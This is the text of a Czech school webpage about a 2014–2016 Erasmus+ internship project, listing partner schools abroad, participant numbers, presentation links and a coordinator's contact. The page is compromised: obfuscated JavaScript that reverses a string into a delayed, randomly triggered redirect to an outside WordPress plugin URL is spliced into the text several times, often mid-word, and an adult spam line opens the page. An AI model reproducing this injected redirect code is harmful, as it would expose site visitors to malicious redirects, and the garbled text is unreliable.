curvy ebony teen spunked.www.tamilkamaveri.monster

Erasmus

 

 

 

 

 

 

Dvouletý projekt krátkodobých odborných stáží

č. 2014-1-CZ01-KA102-000086 s názvem

Znalosti se stávají dovednostmi

/Knowledge comes True /

byl realizován v období dvou školních roků  od 01. 06. 2014 do 31. 5. 2016

Pro zachování vysoké úrovně odbornosti je nutné naučit studenty využít maximum svých teoretických znalostí formou praktických dovedností přímo v praxi.

Praxe ve studovaném oboru v jakékoliv její formě, již během jeho studia, je neocenitelná zkušenost, kterou může student získat, zvlášť když se jedná o stáž v zahraničí, které jako bonus ještě přináší rozšíření jazykových dovedností, nutné rozvinutí osobní samostatnosti, ale i nutnost se umět individuálně prosadit, která je pro výtvarné obory zvlášť důležitá.

Stážista také ke svým praktickým dovednostem ještě získal množství inovační podnětů, které podpořili jeho nutnou kreativitu, schopnost využívat nejmodernější ICT nástroje a inspiraci jak pro svou osobní podporu, tak pro vlastní odbornost.

 

Totoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to všechno by student nemohl získat bez podpory a vedení dobře připraveným pedagogem, protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to bylo  nutné současně podpořit i přípravu, osobní i odborný rozvoj pedagogů, kteří budou se studenty  během jejich  studia pracují.

 

Destinace odborných stáží pro studenty a pedagogy byly v partnerských školách v: 

Birmingram Metropolitan College /UK / 8 studentů a 2 pedagogové

KEKPA-DIEK Volos /EL/ 5 studentů

Berufsschule V der Stadt Nurnberg /DE/ 5 studentů a 1 pedagog

Lycée des Métiers les Coteaux /FR/ 6 studentů a 1 pedagog

Tampere kaupunki /FI /4 5 studentů a 2 pedagogové

Escola Artistica de Soares dos Reis /PT/ 4 studenti

Do projektu byli zapojeni studenti všech oborů i úrovní studia naší školy.

/ jejich počet byl díky dobré organizaci navýšen oproti schválenému projektu o 6 účastníků /

V 1. etapě, která byla realizována ve školním roce 2014/2015 vyjelo 16

studentů do destinací v Německu, Řecku, Anglie a Finska.

Ve 2. etapě, která byla realizována ve školním roce 2015/2016 vyjeli zbylí účastníci do Anglie, Portugalska, Finska a Francie.

Práce a průběh projektu byly po celou dobu zveřejňovány a jedním z výstupu je Brožura ERASMUS+2016 Znalosti se stávají dovednostmi, která mapuje projekt, dále proběhl  Erasmus+ DAY – samostatná prezentace výstupů na závěr projektu, módní přehlídky inspirované stáží, klauzurní práce ,  samostatné prezentace aj.

Ukázky prezentací účastníků mobilit.

Erasmus + Birmingham

http://birmingham2015.iplace.cz/

https://www.youtube.com/watch?v=HO7gURz4lYU

Erasmus + Volos

http://volos2015.tumblr.com/

http://volos2015byerasmus.blogspot.cz/

 Erasmus + Norimberk

http://norimberk2015.wgz.cz/

Erasmus + Cannes /FR/

http://jalbum.net/fr/browse/user/album/1708962

Erasmus + Portoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to /P/

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to2015.webgarden.cz/“>http://portoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to2015.webgarden.cz/

Erasmus+ London

Prezentace ke stažení

 

Ve školním roce 2016/2017 pak na projekt navazujeme projektem “ Praxe jako inspirace? „, informace sledujte na Intranetu

v případě zájmu více informací poskytne

Ing. Věra Tasoulasová

koordinátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor projektu, zástup. řed.

mail: vera.tasoulasova@vosonspso.cz

© 2014 vosonspso.cz | Všechna práv